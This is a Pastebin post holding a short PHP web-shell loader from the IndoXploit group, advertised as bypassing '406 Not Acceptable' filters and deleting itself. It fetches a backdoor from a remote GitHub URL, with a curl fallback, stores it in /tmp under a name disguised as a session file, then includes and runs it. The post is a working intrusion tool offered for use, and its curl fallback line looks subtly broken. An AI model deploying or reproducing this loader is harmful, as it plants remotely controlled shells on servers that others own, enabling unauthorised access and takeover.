SHARE
TWEET

TMP SHELL [Bypass 406 & Auto Delete Shell]

AgusSR Jul 7th, 2017 (edited) 4,601 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. # IndoXploit Backdoor
  3. # Bypass 406 Not Acceptable & Auto Delete Shell
  4. # Coded by: L0c4lh34rtz - IndoXploit
  5.  
  6. $URL = 'https://raw.githubusercontent.com/agussetyar/idxv3/master/indoxploit.php';  # Backdoor URL
  7. $TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'; # dont change this !!
  8.  
  9. function M() {
  10.     $FGT = @file_get_contents($GLOBALS['URL']);
  11.     if(!$FGT) {
  12.         echo `curl -k $(echo {$GLOBALS['URL']} | base64 -d) > {$GLOBALS['TMP']}`;
  13.     } else {
  14.         $HANDLE = fopen($GLOBALS['TMP'], 'w');
  15.         fwrite($HANDLE, $FGT);
  16.         fclose($HANDLE);
  17.     }
  18.     echo '<script>window.location="?indoxploit";</script>';
  19. }
  20.  
  21. if(file_exists($TMP)) {
  22.     if(filesize($TMP) === 0) {
  23.         unlink($TMP);
  24.         M();
  25.     } else {
  26.         include($TMP);
  27.     }
  28. } else {
  29.     M();
  30. }
  31. ?>
RAW Paste Data
Top